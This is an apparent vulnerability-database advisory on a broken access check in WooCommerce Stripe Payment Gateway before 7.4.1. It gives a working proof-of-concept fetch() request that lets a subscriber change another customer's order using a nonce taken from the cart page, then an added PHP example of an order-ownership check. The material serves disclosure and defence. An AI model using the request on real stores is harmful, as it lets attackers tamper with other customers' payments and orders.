wpexploit | Wpvulndb | WPEX-ID:BDE23A65-476D-411B-A0D3-F2B9D7112C01
History: Jun 26, 2023 - 12:00 a.m.

WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update

2023-06-26 00:00:00
wpvulndb
95
woocommerce
stripe payment gateway
ajax functions
subscriber
security exploit

EPSS: 0
Percentile: 9.0%

The plugin does not properly restrict users from making a certain set of changes to other customers’ orders. TODO: ADD link to Patchstack’s post instead of H1

Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax

As a subscriber, go to the cart page (i.e. https://example/cart/) and grab the updateFailedOrderNonce nonce, then perform the request below (42 being a Completed Order ID):

fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
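
The request above succeeds because a valid nonce is treated as sufficient authorization. As an added example (not the plugin's code and not its 7.4.1 fix), this is one way an AJAX handler of this kind can bind the order to the requester before changing it; the example_* handler, nonce action, hook name and the order_key parameter are hypothetical, and WordPress with WooCommerce is assumed to be loaded.

```php
<?php
// Added example: hypothetical handler, not the plugin's code or its 7.4.1 patch.
// Assumes WordPress and WooCommerce are loaded; every example_* name is made up.

/** True only if the requester is allowed to modify this order. */
function example_requester_owns_order( $order ) {
	if ( ! $order instanceof WC_Order ) {
		return false; // unknown ID, or a refund object
	}
	if ( current_user_can( 'edit_shop_orders' ) ) {
		return true; // shop staff
	}
	$user_id = get_current_user_id();
	if ( $user_id > 0 ) {
		// Logged-in customer: the order must be theirs.
		return (int) $order->get_customer_id() === $user_id;
	}
	// Guest checkout (assumed design): bind the request to the order key.
	$key = isset( $_POST['order_key'] ) ? wc_clean( wp_unslash( $_POST['order_key'] ) ) : '';
	return '' !== $key && 0 === (int) $order->get_customer_id() && $order->key_is_valid( $key );
}

function example_update_failed_order_ajax() {
	// The nonce only proves the request came from a page rendered for this
	// session. It does not say which orders the session may touch.
	if ( ! check_ajax_referer( 'example_update_failed_order', '_wpnonce', false ) ) {
		wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
	}

	$order_id = isset( $_POST['order_id'] ) ? absint( wp_unslash( $_POST['order_id'] ) ) : 0;
	$order    = $order_id ? wc_get_order( $order_id ) : false;

	// Same response for "missing" and "not yours", so IDs cannot be enumerated.
	if ( ! example_requester_owns_order( $order ) ) {
		wp_send_json_error( array( 'message' => 'Order not available.' ), 403 );
	}

	// Assumed state rule: a settled order (the Completed order in the request
	// above) is never a valid target for a failed-payment update.
	if ( ! $order->has_status( array( 'pending', 'failed' ) ) ) {
		wp_send_json_error( array( 'message' => 'Order not available.' ), 403 );
	}

	// ... the actual order update would go here ...
	wp_send_json_success();
}
add_action( 'wc_ajax_example_update_failed_order', 'example_update_failed_order_ajax' );
```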
